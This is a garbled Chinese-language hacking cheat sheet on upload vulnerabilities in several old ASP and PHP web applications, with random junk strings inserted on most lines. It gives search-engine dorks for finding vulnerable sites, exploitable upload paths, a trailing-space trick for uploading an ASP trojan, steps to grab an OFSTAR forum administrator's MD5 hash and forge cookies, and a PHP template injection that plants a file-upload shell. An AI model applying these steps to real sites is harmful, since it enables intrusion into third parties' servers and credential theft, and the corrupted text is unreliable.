一、E时代驿站漏洞
Z=
!*e~j@ 百度搜索"E时代驿站"
zT[!o
j7 漏洞利用页面 /upload.asp 用老兵直接上传
3~\[7I/ d\Zng!Z ' 二、沸腾新闻系统上传漏洞
vI]N^j2% 搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用
_~pbqa,
漏洞:没有对空格进行严格的限制。
5PW^j\G-f 所以,我们直接选定要上传的asp木马,然后在后面加上空格
rGkyGz8> 它的上传文件是UploadFaceOK.asp
c)tfAD(N8x \Roz$t-R|f 三、尘缘雅境
x`?3C"N:< 4fzZ;2sl} 在GOOGLE里搜索关键词: V1.0 ACCESS Finish,就会看
akT6^cP^ 到出现了 一大堆 使用尘缘雅境系统的网站.比如说他的网站首页是
http://www.xx.com/asfq/index.asp,那么就要这样填写
http://www.xx.com/asfq/admin/uploadfaceok.asp,[漏洞目录]:/asfq/admin(注意一定要加上admin),[漏洞文件]一般不用改,不过有些老版的尘缘系统的漏洞文是uploadok.asp,如果uploadfaceok.asp不成功再改
p:%loDk Q,9oKg 四、OFSTAR论坛漏洞利用程序(群共享中)
j.kG};f 搜索: powered by ofstar.net
9/;P->wy 1:输入管理员用户名
=2 kG%9 2:输入任意一个帖子的路径!
E E'!|N3 3:单击获取密码,可以截取到管理员的MD5密码!是32位加密的!
E"@wek.- 4:单击直接登陆按钮!程序会自动构造Cookies进行锹?单击管理栏的"超管"可直接进入后台!
9/7u*>: cAc@n6[`3 上传木马: 选择后台的论坛管理=>风格摸版设置 插入以下代码! (其实上传shell部分和PHPWind一样)
N&pCx&
BB'OCN 然后使用提交页面提交``可以直接拿到shell!
frQ{iUx &=Wlaa/,& <style type='text/css'>
KdlQ!5(?X </style>
LDD|(KLR*. <!--
UDni]P!E EOT;
l+R+&b^ ?>-->
y Wya&|D9 <?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
gO^gxJ'0t <!--
=ruao'A <?php
8*fv' print <<<EOT
HKr
Mim- -->
)Wox Mmz .6V}3q$-@ 五、破废墟BLOG漏洞
_l]fkk[T 百度搜:"破废墟 Bloging" ,在后面加上upfile.asp,结果返回
e$pV%5= DLOG错误:提交的数据来自网站外部 | 返 回
hzRYec( 或者 您要访问的网页有问题,无法显示。
Gbw2E&a